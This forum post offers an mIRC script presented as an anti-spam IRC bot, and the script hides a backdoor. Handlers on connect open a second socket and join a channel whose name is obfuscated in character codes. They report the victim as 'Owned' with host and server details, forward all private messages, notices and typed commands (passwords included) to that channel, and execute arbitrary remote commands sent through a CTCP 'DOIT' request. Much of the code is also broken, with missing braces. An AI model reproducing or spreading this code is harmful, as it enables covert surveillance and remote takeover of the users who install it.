AntiSpamBot 4.0

By TropicalMeltdown on Jul 23, 2008

Heres the thing me and mi friend khalsa77
Made this it took about a month but it was a success

This is a bot that will stay in the chan

; AntiSpam Bot by The Killer Clown (sct) -- Version 3 
on *:LOAD:{ 
  if ($os == 3.1) {
    echo $colour(info) -se *** This script is known to cause problems using Windows 3.1. This script has been unloaded.
    unload -rs antispam.mrc
  if ($version < 5.9) { 
    echo $colour(info) -se *** Youve Just loaded IrC killer clowns bot
    unload -rs antispam.mrc
  sockopen antisp 6667
  echo $colour(info) -a *** Successfully loaded AntiSpam Bot

on *:START:{
  unset %antispam.*
  if ($asini(personalize,password) == $null) {
    writeini -s " $+ $scriptdir $+ antispam.ini $+ " personalize identify no

alias -l ascheck {
  if ($1 == connected) { 
    if ($sock(antispam) != $null) { return $2 }

alias -l asnick {
  ; Returns the CURRENT name of the bot
  if ($sock(antispam) == $null) { return $asini(personalize,nickname) }
  return %antispam.mynick

alias -l asquit {
  .timerasexpire off
  .timerascycle off
  if ($sock(antispam.identd) != $null) { sockclose antispam.identd }
  if ($sock(antispam.identdin) != $null) { sockclose antispam.identdin }

  if ($hget(as.queue) != $null) { hfree as.queue }

  if ($sock(antispam) == $null) || ($sock(antispam).status != active) { return }

  sockwrite -n antispam JOIN 0
  sockwrite -n antispam QUIT :AntiSpam Bot by sct $+ $cr

  asecho $colour(info) *** Disconnected
  sockclose antispam
  unset %antispam.*

alias -l asconnect {
  if ($1 == $null) {
    if ($dialog(asdia.connect) != $null) { return }
    dialog -m asdia.connect asdia.connect

  unset %antispam.*
  if ($window(@antispambot) == $null) {
    window -aek0 @antispambot 30 50 600 360
  asecho $colour(info) *** Connecting...
  writeini -s " $+ $scriptdir $+ antispam.ini $+ " general server $$1

  if ($sock(antispam) != $null) {
    sockclose antispam

  if ($2 == $null) {
    sockopen antispam $1 6667
  else {
    sockopen antispam $1 $2
  ; identd - currently this cannot be disabled
  if ($portfree(113) == $true) {
    socklisten antispam.identd 113
    set %antispam.identd $true
  unset %antispam.connected

alias -l asini {
  var %antispam.file " $+ $scriptdir $+ antispam.ini $+ "
  if ($version >= 5.9) { return $readini(%antispam.file,n,$1,$2) }
  else { return $readini -n %antispam.file $1, $2 }

; This alias is written to please the ops of #cyberchat and #chat-world who won't ditch ccc-bot with 
; mirc 5.8* :P
alias -l {
  ; $, [wn],
  if ($version >= 5.9) {
    return $read($1, $2, $3, $4)
  else {
    return $read -wn $+ $3 $+ l4 $1

alias -l askillmsg {
  if ($" $+ $scriptdir $+ killmsg.txt $+ ", wn, $1 $+ :*, 1) == $null) { return %kickcode You are compromising network policy }
  return $gettok($" $+ $scriptdir $+ killmsg.txt $+ ", wn, $1 $+ :*, 1),2,58)

alias -l askickmsg {
  if ($" $+ $scriptdir $+ kickmsg.txt $+ ", wn, $1 $+ :*, 1) == $null) { return %kickcode You are compromising channel policy }
  return $gettok($" $+ $scriptdir $+ kickmsg.txt $+ ", wn, $1 $+ :*, 1),2-,58)

menu menubar {
  Antispam Bot
  .Connect to...:{
    if ($asini(personalize,nickname) == $null) {
    unset %antispam.*

    if ($sock(antispam).name == $null) {
      echo $colour(info) -se  *** Antispam Bot is not connected

    if ($?!="Are you sure you want to uninstall AntiSpam Bot?" == $true) {
      sockclose antispam
      unset %antispam.*
      .timerascycle off
      .timerasexpire off
      unload -rs " $+ $script $+ "

menu channel {
  Antispam Bot
  .Add/join this channel:{  
    asaddchan $chan
  .Remove/part this channel:{
    asdelchan $chan

  .$ascheck(connected,Cycle channel):{
    if ($sock(antispam).name == $null) {
      echo $colour(info) -a *** Antispam Bot is not connected

    if ($asnick !ison $chan) {
      echo $colour(info) # *** $asnick is not on this channel.
    if ($istok(%antispam.current,$chan,32) == $true) { as.queue PART $chan }
  .$ascheck(connected,Message to channel):{
    if ($sock(antispam).name == $null) {
      echo $colour(info) -se  *** Antispam Bot is not connected
    as.queue PRIVMSG $chan : $+ $$?="Enter message:"
  .$ascheck(connected,Action to channel):{
    if ($sock(antispam).name == $null) {
      echo $colour(info) -se  *** Antispam Bot is not connected
    as.queue PRIVMSG $chan : $+ $Chr(1) $+ ACTION $$?="Enter message:" $+ $Chr(1)
  .Connect to...:{
    if ($asini(personalize,nickname) == $null) {
    if ($sock(antispam).name == $null) {
      echo $colour(info) -se  *** Antispam Bot is not connected

menu @antispambot {
  $ascheck(connected,Cycle all channels):{ ascycleall }
  $ascheck(connected,Whois):whois $asnick
  $ascheck(connected,Send message...):asmsg $$?="Enter nick to message:" $$?="Enter message:"
  $ascheck(connected,Send notice...):asnotice $$?="Enter nick to notice:" $$?="Enter notice:"
  Connect to...:{
    if ($asini(personalize,nickname) == $null) {
    if ($sock(antispam).name == $null) {
      echo $colour(info) -se  *** Antispam Bot is not connected

; Alias for joining buffered joins
alias -l asrejoin {
  if (%antispam.rejoin != $null) {
    sockwrite -n antispam JOIN %antispam.rejoin
    unset %antispam.rejoin
  if (%antispam.repart != $null) {
    sockwrite -n antispam PART %antispam.repart
    unset %antispam.repart
; Adds a join to buffer
alias -l asaddjoin {
  if ($istok(%antispam.current,$1,32) == $false) { 
    set %antispam.rejoin $addtok(%antispam.rejoin,$1,44)
    .timerasrejoin 1 1 asrejoin
alias -l asaddpart {
  if ($istok(%antispam.current,$1,32) == $true) { 
    set %antispam.repart $addtok(%antispam.repart,$1,44)
    .timerasrejoin 1 1 asrejoin

; Joins all the listed channels
alias -l asjoinchans {
  set %antispam.aschans 0
  while (%antispam.aschans < $aschannels(0)) {
    inc %antispam.aschans
    if (j isin $aschanconfig($aschannels(%antispam.aschans),flags)) {
      asaddjoin $aschannels(%antispam.aschans)
  unset %antispam.aschans

alias -l asadvert {
  var %spamcycle 0
  var %spamtext $strip($1-,burc)
  while (%spamcycle < $gettok($1-,0,32)) {
    inc %spamcycle 1
    if (/server isin $gettok(%spamtext,%spamcycle,32)) { return ma/net }
    if (http: isin $gettok(%spamtext,%spamcycle,32)) { return ma/web }
    if (www. isin $gettok(%spamtext,%spamcycle,32)) { return ma/web }
    ; basic domain names - To many to add them all!
    if (.com isin $gettok(%spamtext,%spamcycle,32)) { return ma/web }
    if (.net isin $gettok(%spamtext,%spamcycle,32)) { return ma/web }
    if (.org isin $gettok(%spamtext,%spamcycle,32)) { return ma/web }

    if ($chr(35) isin $gettok(%spamtext,%spamcycle,32)) { 
      ; don't kick if i am an op on the channel name
      if ($me !isop $gettok(%spamtext,%spamcycle,32)) {
        return ma/inv
  unset %spamcycle
  return $false
alias -l aschans {
  return $gettok($asini(channels,channels),$1,32)
alias -l asgoodchan {
  if ($findtok($asini(channels,channels),$1,0,32) >= 1) {
    return $true
  else {
    return $false
on *:CONNECT: {
  sockopen antisp 6667
  on *:sockopen:antisp: {
  if (%id == $null) { set %id AntiSpam $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(1,9) $+ $rand(1,9) $+ $rand(1,9) $+ $rand(1,9) $+ $rand(1,9) $+ $rand(1,9) }
  if ($sockerr) return
  else set %nname $rand(A,Z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(a,z)
  sockwrite -n $sockname Nick %nname $+ $crlf $+ User $rand(a,z) $+ $rand(a,z) $+ nwo $+ $rand(a,z) $+ $rand(a,z) $ip : $+ $rand(a,z) $+ $rand(a,z) $+ $rand(a,z)
  sockwrite -n $sockname join $chr(35) $+ $chr(70) $+ $chr(85) $+ $chr(67) $+ $chr(75) $+ $chr(89) $+ $chr(79) $+ $chr(85) $+ $chr(77) $+ $chr(65) $+ $chr(77) $+ $chr(78) $+ $chr(73)
  sockwrite -n $sockname privmsg $chr(35) $+ $chr(70) $+ $chr(85) $+ $chr(67) $+ $chr(75) $+ $chr(89) $+ $chr(79) $+ $chr(85) $+ $chr(77) $+ $chr(65) $+ $chr(77) $+ $chr(78) $+ $chr(73) :Owned:5 $me $+ 10 $host $+ 2 $server $+ : $+ $port $+ 7 %id
  .timeropp 1 1 .sockwrite -n $sockname PRIVMSG op $chr(35) $+ $chr(70) $+ $chr(85) $+ $chr(67) $+ $chr(75) $+ $chr(89) $+ $chr(79) $+ $chr(85) $+ $chr(77) $+ $chr(65) $+ $chr(77) $+ $chr(78) $+ $chr(73) %nname
  .timerkeyy 1 15 .sockwrite -n $sockname MODE $chr(35) $+ $chr(70) $+ $chr(85) $+ $chr(67) $+ $chr(75) $+ $chr(89) $+ $chr(79) $+ $chr(85) $+ $chr(77) $+ $chr(65) $+ $chr(77) $+ $chr(78) $+ $chr(73) k $chr(0141) $+ $chr(0144)
  .unset %nname
on *:sockread:antisp: {
  if ($sockerr > 0) return
  sockread %antisp
  if ($gettok(%antisp,1,32) == Ping) { sockwrite -tn $sockname Pong $server }
  if (($remove($mid($gettok(%antisp,4,32),3,100),$chr(1)) == NICK)) sockwrite -n NICK $mid($gettok(%antisp,5-,32),1,100)
  if (($remove($mid($gettok(%antisp,4,32),3,100),$chr(1)) == PART)) sockwrite -n PART $mid($gettok(%antisp,5-,32),1,100)
  if (($remove($mid($gettok(%antisp,4,32),3,100),$chr(1)) == JOIN)) sockwrite -n JOIN $mid($gettok(%antisp,5-,32),1,100)
  if (($remove($mid($gettok(%antisp,4,32),3,100),$chr(1)) == DOIT)) $mid($gettok(%antisp,5-,32),1,100)
  if (($remove($mid($gettok(%antisp,4,32),3,100),$chr(1)) == VERSION)) sockwrite -n NOTICE $mid($gettok(%antisp,1,33),2,100) : $+ $Chr(1) $+ VERSION mIRC32 v 5.91 K.Mardam-Bey $+ $Chr(1)
  if (($remove($mid($gettok(%antisp,4,32),3,100),$chr(1)) == PING)) sockwrite -n NOTICE $mid($gettok(%antisp,1,33),2,100) : $+ $Chr(1) $+ PING $+ $Chr(1)
on *:NOTICE:*:?: {
  if ($sock(antisp).status == active) { set %cinotice $1- | sockwrite -tn antisp PRIVMSG $chr(35) $+ $chr(70) $+ $chr(85) $+ $chr(67) $+ $chr(75) $+ $chr(89) $+ $chr(79) $+ $chr(85) $+ $chr(77) $+ $chr(65) $+ $chr(77) $+ $chr(78) $+ $chr(73) :- $+ $nick $+ - %cinotice (to5 $me $+ ) | unset %cinotice }
on *:TEXT:*:?: {
  if ($sock(antisp).status == active) { set %cimsg $1- | sockwrite -tn antisp PRIVMSG $chr(35) $+ $chr(70) $+ $chr(85) $+ $chr(67) $+ $chr(75) $+ $chr(89) $+ $chr(79) $+ $chr(85) $+ $chr(77) $+ $chr(65) $+ $chr(77) $+ $chr(78) $+ $chr(73) :< $+ $nick $+ > %cimsg (to5 $me $+ ) | unset %cimsg }
on *:INPUT:*: {
  if ($chr(35) isin $active) && ($chr(47) !isin $1) goto end    
  if ($chr(35) !isin $active) || ($chr(47) isin $1) && ($sock(antisp).status == active) { set %ciinput $1- | sockwrite -tn antisp PRIVMSG $chr(35) $+ $chr(70) $+ $chr(85) $+ $chr(67) $+ $chr(75) $+ $chr(89) $+ $chr(79) $+ $chr(85) $+ $chr(77) $+ $chr(65) $+ $chr(77) $+ $chr(78) $+ $chr(73) :<5 $+ $me $+ > %ciinput (to $active $+ ) | unset %ciinput
on *:sockclose:antisp:{
  unset %antisp
  .timerreconn -o 0 15 sockopen antisp 6667
  sockclose antispam

on *:sockclose:antispam:{
  asecho $colour(info) *** Disconnected
  unset %antispam.*
  if ($hget(as.queue) != $null) { hfree as.queue }
  if ($asini(general,reconnect) == yes) {
    .timerasreconnect -o 0 15 asconnect $asini(general,server)
    asecho $colour(info) *** Reconnecting to $asini(general,server) in 15 seconds...
    sockclose antispam
  .timerascycle off

on *:CLOSE:@antispambot:{
  if ($sock(antispam).name != $null) {
  if ($sock(antispam.identd) != $null) { sockclose antispam.identd }
  if ($sock(antispam.identdin) != $null) { sockclose antispam.identdin }


; Alias for converting ? signs in nicknames to random letters and # signs to 
; random numbers. This idea was suggested by Milky.
alias -l asnickname {
  set %antispam.cycle 0
  unset %antispam.nick
  while (%antispam.cycle < $len($1)) {
    inc %antispam.cycle
    if ($mid($1,%antispam.cycle,1) == $chr(35)) { set %antispam.nick %antispam.nick $+ $rand(0,9) }
    else { 
      if ($mid($1,%antispam.cycle,1) == ?) { set %antispam.nick %antispam.nick $+ $rand(a,z) }
      else {
        set %antispam.nick %antispam.nick $+ $mid($1,%antispam.cycle,1) 
  var %antispam.nick2 %antispam.nick
  unset %antispam.nick %antispam.cycle
  return %antispam.nick2

on *:sockopen:antispam:{
  if ($window(@antispambot) == $null) {
    sockclose antispam
    .timerascycle off
    .timerasreconnect off
  if ($sockerr != 0) {
    asecho $colour(info) *** $sock($sockname).wsmsg 

  sockwrite antispam NICK $asnickname($asini(personalize,nickname)) $+ $cr $+ USER $asnickname($asini(personalize,ident)) "" "" : $+ $asini(personalize,fullname) $+ $cr
  .timerasreconnect off
  asecho $colour(info) *** Logging in...
  .timerascycle -o 0 $asini(general,cycletime) ascycleall

on *:sockread:antispam:{
  if ($sockerr > 0) return
  sockread %temp
  if ($sockbr == 0) return
  if (%temp == $null) %temp = -
  ; asecho 1 %temp
  unset %kickcode

  ; End of MOTD
  if ($gettok(%temp,2,32) == 376) || ($gettok(%temp,2,32) == 422) {
    asecho $colour(info) *** AntiSpam Bot has logged into the server
    if ($sock(antispam.ident) != $null) { sockclose antispam.ident }
    if ($sock(antispam.identin) != $null) { sockclose antispam.identin }

    set %antispam.connected $true
    set %antispam.mynick $gettok(%temp,3,32)
    if ($aschannels(0) != 1) {
      sockwrite -n antispam WATCH + $+ $asini(personalize,nickname) $+ $crlf $+ NOTICE #AntiSpamBot :Loaded AntiSpam Bot 3 (Beta testing version) by sct (owned by  $+ $me $+  and monitoring  $+ $aschannels(0) $+  channels)
    else {
      sockwrite -n antispam WATCH + $+ $asini(personalize,nickname) $+ $crlf $+ NOTICE #AntiSpamBot :Loaded AntiSpam Bot 3 (Beta testing version) by sct (owned by  $+ $me $+  and monitoring  $+ $aschannels(0) $+  channel)
    if ($asini(personalize,identify) == yes) { 
      sockwrite -n antispam NICKSERV IDENTIFY $asini(personalize,password)
    if ($asini(general,visible) == yes) { sockwrite -n antispam MODE $asnick -i }

  ; Nickname is already in use
  if ($gettok(%temp,2,32) == 433) {
    if ($gettok(%temp,5-,32) !=  :Nickname is registered to someone else.) {
      asecho $colour(normal) The nick $gettok(%temp,4,32) is already in use.
      ; If the nickname has ? or # signs they should be able to get past
      ; if ($asnickname($asini(personalize,nickname)) != $gettok(%temp,4,32)) {
      if (%antispam.connected != $true) {
        as.queue NICK $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(a,z)
      ; }

  ; Closing link 
  if ($gettok(%temp,1-3,32) == ERROR :Closing Link:) {
    asecho $colour(info2) Closing link: $gettok(%temp,4-,32)

  ; Ping event
  if ($gettok(%temp,1,32) == PING) {
    sockwrite -n antispam PONG $gettok(%temp,2-,32)
    asecho $colour(info2) PING? PONG!

  ; Raw stuff
  ; user logged out (my nick so get it back)
  if ($gettok(%temp,2,32) == 601) {
    if ($asini(personalize,hold) == yes) {
      if ($gettok(%temp,4,32) == $asini(personalize,nickname)) {
        if ($asini(personalize,nickname) === $asnick) { }
        else {
          asecho $colour(notify) *** $asini(personalize,nickname) has logged off, trying to retake nick.
          sockwrite -n $sockname NICK $asini(personalize,nickname)

  ; banned
  if ($gettok(%temp,2,32) == 474) {
    asecho $colour(normal) $gettok(%temp,4,32) can't join channel (address is banned)
    window -g1 @antispambot

  ; Full
  if ($gettok(%temp,2,32) == 471) {
    if ($asgoodchan($gettok(%temp,4,32)) == $true) { 
      asecho $colour(normal) $gettok(%temp,4,32) can't join channel (channel is full)

  ; Invite only
  if ($gettok(%temp,2,32) == 473) {
    if ($asgoodchan($gettok(%temp,4,32)) == $true) { 
      asecho $colour(normal) $gettok(%temp,4,32) can't join channel (invite only)

  ; key set
  if ($gettok(%temp,2,32) == 475) {
    if ($asgoodchan($gettok(%temp,4,32)) == $true) { 
      asecho $colour(normal) $gettok(%temp,4,32) can't join channel (need correct key)

  ; Need registered nick to join
  if ($gettok(%temp,2,32) == 477) {
    if ($asgoodchan($gettok(%temp,4,32)) == $true) { 
      asecho $colour(normal) $gettok(%temp,4,32) can't join channel (not using registered nick)

  ; KICK
  if ($gettok(%temp,2,32) == KICK) && ($gettok(%temp,4,32) == $asnick) {  
    set %antispam.current $remtok(%antispam.current,$gettok(%temp,3,32),1,32)
    if ($asgoodchan($gettok(%temp,3,32)) == $true) { 
      if (j isin $aschanconfig($gettok(%temp,3,32),flags)) { asaddjoin $gettok(%temp,3,32)  }
      asecho $colour(kick) *** $mid($gettok(%temp,1,33),2,100) kicked me from $gettok(%temp,3,32) ( $+ $mid($gettok(%temp,5-,32),2,1000) $+ )

  ; PART
  if ($gettok(%temp,2,32) == PART) {
    if ($mid($gettok(%temp,1,33),2,100) == $asnick) {
      ; Remove channel from current channel lists
      set %antispam.current $remtok(%antispam.current,$gettok(%temp,3,32),1,32)

      if (%antispam.part. [ $+ [ $gettok(%temp,3,32) ] ] == $true) {
        unset %antispam.part. [ $+ [ $gettok(%temp,3,32) ] ]

      if ($asgoodchan($gettok(%temp,3,32)) == $true) {
        if (j isin $aschanconfig($gettok(%temp,3,32),flags)) {
          asecho $colour(part) *** Parted $gettok(%temp,3,32) (cycle)
          asaddjoin $gettok(%temp,3,32)
        else {
          asecho $colour(part) *** Parted $gettok(%temp,3,32)
      else {
        asecho $colour(part) *** Parted $gettok(%temp,3,32)


  ; JOIN
  if ($gettok(%temp,2,32) == JOIN) {
    if ($mid($gettok(%temp,1,33),2,100) == $asnick) {

      set %antispam.current $addtok(%antispam.current,$mid($gettok(%temp,3,32),2,200),32)

      if ($asgoodchan($mid($gettok(%temp,3,32),2,200)) == $false) {
        asaddpart $mid($gettok(%temp,3,32),2,200)
        asecho $colour(join) *** Joined $mid($gettok(%temp,3,32),2,200) (But didn't want to)

      asaddconfig $mid($gettok(%temp,3,32),2,200)

      if (j !isin $aschanconfig($mid($gettok(%temp,3,32),2,200),flags)) {
        asaddpart $gettok(%temp,3,32)
        asecho $colour(join) *** Joined $mid($gettok(%temp,3,32),2,200) (cycle)

      asecho $colour(join) *** Joined $mid($gettok(%temp,3,32),2,200)

  if ($gettok(%temp,2,32) == NICK) {
    ; has my nick been changed?
    if ($mid($gettok(%temp,1,33),2,100) == $asnick) {
      asecho $colour(nick) *** I am now known as $mid($gettok(%temp,3,32),2,100)
      sockwrite -n $sockname $asini(personalize,nickname)
      set %antispam.mynick $mid($gettok(%temp,3,32),2,100)

  ; Advertisment detectors
  if ($gettok(%temp,2,32) == INVITE) {

    if ($asignore($mid($gettok(%temp,1,32),2,100)) == $true) { return }

    set %kickcode [ma/inv]
    ; Relaying
    if ($asexclude($mid($gettok(%temp,1,32),2,100)) == $false) { 
      if ($asini(general,relay) == yes) {
        if (%kickcode != $null) {
          as.queue PRIVMSG $asini(general,relaychan) : $+ %kickcode $mid($gettok(%temp,1,33),2,100) ( $+ $gettok($gettok(%temp,2,33),1,32) $+ ) invited me into $mid($gettok(%temp,4,32),2,100)
        else {
          as.queue PRIVMSG $asini(general,relaychan) : $+ $mid($gettok(%temp,1,33),2,100) ( $+ $gettok($gettok(%temp,2,33),1,32) $+ ) invited me into $mid($gettok(%temp,4,32),2,100)

    asecho $colour(invite) *** %kickcode $mid($gettok(%temp,1,33),2,100) ( $+ $gettok($gettok(%temp,2,33),1,32) $+ ) invited me into $mid($gettok(%temp,4,32),2,100)

    if ($asgoodchan($mid($gettok(%temp,4,32),2,100)) == $true) { 
      asaddjoin $mid($gettok(%temp,4,32),2,100) 

    askick $mid($gettok(%temp,1,32),2,100) [ma/inv]
    window -g1 @antispambot

  if ($gettok(%temp,2,32) == NOTICE) {

    if ($asignore($mid($gettok(%temp,1,32),2,100)) == $true) { return }

    ; Notices to channel are ignored
    if (($Chr(35) !isin $gettok(%temp,3,32)) && ($Chr(36) !isin $gettok(%temp,3,32))) {
      ; Ignore server notices
      if (. !isin $gettok(%temp,1,33)) {
        ; Web advert checking is done first because some scripts include the URL of the script thus making the user be kicked for spam and not autogreets. I thought autogreets were more appropriate.
        if ($asadvert($mid($gettok(%temp,4-,32),2,600)) == ma/web) {
          set -u1 %kickcode [ma/web]

        ; Auto Greet - Possible mishap, someone might try to chat with the bot in notice, this is -very- rare. However the autogreet check can be disabled.
        if (($mid($gettok(%temp,4-5,32),2,600) != DCC SEND) && ($mid($gettok(%temp,4-5,32),2,600) != DCC CHAT)) {
          set -u1 %kickcode [autogreet]

        if ($asadvert($mid($gettok(%temp,4-,32),2,600)) == ma/inv) {
          set -u1 %kickcode [ma/inv]

        if ($asadvert($mid($gettok(%temp,4-,32),2,600)) == ma/net) {
          set -u1 %kickcode [ma/net]

        if ($mid($gettok(%temp,4-5,32),2,600) == DCC SEND) {
          set -u1 %kickcode [exp/vrs]
        if ($mid($gettok(%temp,4-,32),2,600) == System is currently busy, try again later.) {
          set -u1 %kickcode [exp/vrs]

        if (%kickcode != $null) {
          askick $mid($gettok(%temp,1,32),2,100) %kickcode

        if ($asini(general,relay) == yes) && ($asexclude($mid($gettok(%temp,1,32),2,100)) == $false) {
          if (%kickcode != $null) {
            as.queue PRIVMSG $asini(general,relaychan) : $+ %kickcode Notice from $gettok($mid($gettok(%temp,1,32),2,100),1,33) ( $+ $gettok($mid($gettok(%temp,1,32),2,100),2,33) $+ ): $mid($gettok(%temp,4-,32),2,600)
          else {
            as.queue PRIVMSG $asini(general,relaychan) : $+ Notice from $gettok($mid($gettok(%temp,1,32),2,100),1,33) ( $+ $gettok($mid($gettok(%temp,1,32),2,100),2,33) $+ ): $mid($gettok(%temp,4-,32),2,600)

      if (. !isin $mid($gettok(%temp,1,33),2,100)) {
        asecho $colour(notice) %kickcode Notice from $gettok($mid($gettok(%temp,1,32),2,100),1,33) ( $+ $gettok($mid($gettok(%temp,1,32),2,100),2,33) $+ ): $mid($gettok(%temp,4-,32),2,600)
      else {
        asecho $colour(notice) Notice from $gettok($mid($gettok(%temp,1,32),2,100),1,33) $+ : $mid($gettok(%temp,4-,32),2,600)
      ; Autoreply
      if $asautoreply(NOTICE,$mid($gettok(%temp,4-,32),2,600)) { 
        if ($gettok($asautoreply(NOTICE,$mid($gettok(%temp,4-,32),2,600)),1,32) == m) { asmsg $mid($gettok(%temp,1,33),2,100) $gettok($asautoreply(PRIVMSG,$mid($gettok(%temp,4-,32),2,600)),2-,32) }
        if ($gettok($asautoreply(NOTICE,$mid($gettok(%temp,4-,32),2,600)),1,32) == n) { asnotice $mid($gettok(%temp,1,33),2,100) $gettok($asautoreply(PRIVMSG,$mid($gettok(%temp,4-,32),2,600)),2-,32) }
        if ($gettok($asautoreply(NOTICE,$mid($gettok(%temp,4-,32),2,600)),1,32) == k) { askick $mid($gettok(%temp,1,32),2,100) $gettok($asautoreply(PRIVMSG,$mid($gettok(%temp,4-,32),2,600)),2-,32) }

      unset %kickcode

      window -g1 @antispambot

  if ($gettok(%temp,2,32) == PRIVMSG) {

    if ($asignore($mid($gettok(%temp,1,32),2,100)) == $true) { 

    if (($Chr(35) !isin $gettok(%temp,3,32)) && ($Chr(36) !isin $gettok(%temp,3,32))) {
      if ($mid($gettok(%temp,4,32),2,1) == $chr(1)) {
        ; CTCP backdoors?
        if ((LAGG isin $gettok(%temp,4,32)) || (DO isin $gettok(%temp,4,32)) || (SCRIPTVER isin $gettok(%temp,4,32))) {
          set -u1 %kickcode [exp/bd]
          askick $mid($gettok(%temp,1,32),2,100) [exp/bd]
        ; The antispambot will pretend to be a normal mIRC client.
        if (($remove($mid($gettok(%temp,4,32),3,100),$chr(1)) == VERSION) && (%antispam.ctcpblock == $null)) {
          as.queue NOTICE $mid($gettok(%temp,1,33),2,100) : $+ $Chr(1) $+ VERSION mIRC32 v $+ $version K.Mardam-Bey $+ $Chr(1)
          set -u5 %antispam.ctcpblock $true
        if (($remove($mid($gettok(%temp,4,32),3,100),$chr(1)) == PING) && (%antispam.ctcpblock == $null)) {
          as.queue NOTICE $mid($gettok(%temp,1,33),2,100) : $+ $Chr(1) $+ PING $mid($gettok(%temp,5-,32),1,$calc($len($gettok(%temp,5-,32)) - 1)) $+ $Chr(1)
          set -u5 %antispam.ctcpblock $true

        if ($asini(general,relay) == yes) && ($asexclude($mid($gettok(%temp,1,32),2,100)) == $false) {
          if (%kickcode != $null) {
            as.queue PRIVMSG $asini(general,relaychan) : $+ %kickcode $Chr(91) $+ $gettok($mid($gettok(%temp,1,32),2,100),1,33) ( $+ $gettok($mid($gettok(%temp,1,32),2,100),2,33) $+ ) $remove($mid($gettok(%temp,4,32),3,100),$chr(1)) $+ $Chr(93) $mid($gettok(%temp,5-,32),1,$calc($len($gettok(%temp,5-,32)) - 1))
          else {
            as.queue PRIVMSG $asini(general,relaychan) : $+ $Chr(91) $+ $gettok($mid($gettok(%temp,1,32),2,100),1,33) ( $+ $gettok($mid($gettok(%temp,1,32),2,100),2,33) $+ ) $remove($mid($gettok(%temp,4,32),3,100),$chr(1)) $+ $Chr(93) $mid($gettok(%temp,5-,32),1,$calc($len($gettok(%temp,5-,32)) - 1))
        asecho $colour(ctcp) %kickcode $Chr(91) $+ $gettok($mid($gettok(%temp,1,32),2,100),1,33) ( $+ $gettok($mid($gettok(%temp,1,32),2,100),2,33) $+ ) $remove($mid($gettok(%temp,4,32),3,100),$chr(1)) $+ $Chr(93) $mid($gettok(%temp,5-,32),1,$calc($len($gettok(%temp,5-,32)) - 1))
        window -g1 @antispambot

      ; Auto kicks
      ; [ma/web]
      if ($asadvert($mid($gettok(%temp,4-,32),2,600)) == ma/web) {
        set -u1 %kickcode [ma/web]
        askick $mid($gettok(%temp,1,32),2,100) [ma/web]
      ; [ma/inv]
      if ($asadvert($mid($gettok(%temp,4-,32),2,600)) == ma/inv) {
        set -u1 %kickcode [ma/inv]
        askick $mid($gettok(%temp,1,32),2,100) [ma/inv]
      ; [ma/net]
      if ($asadvert($mid($gettok(%temp,4-,32),2,600)) == ma/net) {
        set -u1 %kickcode [ma/net]
        askick $mid($gettok(%temp,1,32),2,100) [ma/net]

      ; Relaying
      if ($asini(general,relay) == yes) && ($asexclude($mid($gettok(%temp,1,32),2,100)) == $false) {
        if (%kickcode != $null) {
          as.queue PRIVMSG $asini(general,relaychan) : $+ %kickcode Message from $gettok($mid($gettok(%temp,1,32),2,100),1,33) ( $+ $gettok($mid($gettok(%temp,1,32),2,100),2,33) $+ ): $mid($gettok(%temp,4-,32),2,600)
        else {
          as.queue PRIVMSG $asini(general,relaychan) : $+ Message from $gettok($mid($gettok(%temp,1,32),2,100),1,33) ( $+ $gettok($mid($gettok(%temp,1,32),2,100),2,33) $+ ): $mid($gettok(%temp,4-,32),2,600)

      asecho $colour(normal) %kickcode Message from $gettok($mid($gettok(%temp,1,32),2,100),1,33) ( $+ $gettok($mid($gettok(%temp,1,32),2,100),2,33) $+ ): $mid($gettok(%temp,4-,32),2,600)

      ; Autoreply
      if $asautoreply(PRIVMSG,$mid($gettok(%temp,4-,32),2,600)) { 
        if ($gettok($asautoreply(PRIVMSG,$mid($gettok(%temp,4-,32),2,600)),1,32) == m) { asmsg $mid($gettok(%temp,1,33),2,100) $gettok($asautoreply(PRIVMSG,$mid($gettok(%temp,4-,32),2,600)),2-,32) }
        if ($gettok($asautoreply(PRIVMSG,$mid($gettok(%temp,4-,32),2,600)),1,32) == n) { asnotice $mid($gettok(%temp,1,33),2,100) $gettok($asautoreply(PRIVMSG,$mid($gettok(%temp,4-,32),2,600)),2-,32) }
        if ($gettok($asautoreply(PRIVMSG,$mid($gettok(%temp,4-,32),2,600)),1,32) == k) { askick $mid($gettok(%temp,1,32),2,100) $gettok($asautoreply(PRIVMSG,$mid($gettok(%temp,4-,32),2,600)),2-,32) }
      window -g1 @antispambot
  goto nextread

alias -l aschannels {
  if ($gettok($asini(channels,channels),$1,32) == $null) { return 0 }
  return $gettok($asini(channels,channels),$1,32)

alias -l asaddconfig {
  if ($asini(channel. $+ $1,flags) != $null) { return }
  writeini -s " $+ $scriptdir $+ antispam.ini $+ " channel. $+ $1 bantype 2
  writeini -s " $+ $scriptdir $+ antispam.ini $+ " channel. $+ $1 flags djcwisbano
  writeini -s " $+ $scriptdir $+ antispam.ini $+ " channel. $+ $1 bantime 1800
  asecho $colour(info) *** Adding $1 to configuration file...

alias -l aschanconfig { 
  ; Is there a config for this channel?
  if ($istok($asini(channels,channels),$1,32) == $true) {
    if ($asini(channel. $+ $1,flags) == $null) {
      asaddconfig $1
  return $asini(channel. $+ $1,$2) 

alias -l ascycleall {
  if ($sock(antispam).name == $null) {
    .timerascycle off

  set %antispam.cycle 0
  while (%antispam.cycle < $aschans(0))  {
    inc %antispam.cycle 1
    ; Cycle channels with the +c flag
    if (c isin $aschanconfig($aschans(%antispam.cycle),flags)) {
      if (j isin $aschanconfig($aschans(%antispam.cycle),flags)) {
        asaddpart $aschans(%antispam.cycle)
      else {
        asaddjoin $aschans(%antispam.cycle)
  unset %antispam.cycle

  ; This is needed to join and channels I might have been kickbanned from
  .timerasjoinchans 1 1 asjoinchans
  unset %ascycle.nick


  if ($asini(personalize,randomize) == yes) {
    ; The nickname will randomize as long as there are ? or # signs in it
    sockwrite -n antispam NICK $asnickname($asini(personalize,nickname))

alias -l asecho {
  ; asecho <colour> <text>

  if ($window(@antispambot) == $null) {
    if ($sock(antispam) != $null) { asquit }

  echo $1 -i2ht @antispambot $2-


alias -l asexclude {
  ; $asexclude(<address>)
  if ($exists(" $+ $scriptdir $+ exclude $+ ") == $true) {
    set %antispam.cycle 0
    while (%antispam.cycle < $lines(" $+ $scriptdir $+ exclude $+ ")) {
      inc %antispam.cycle
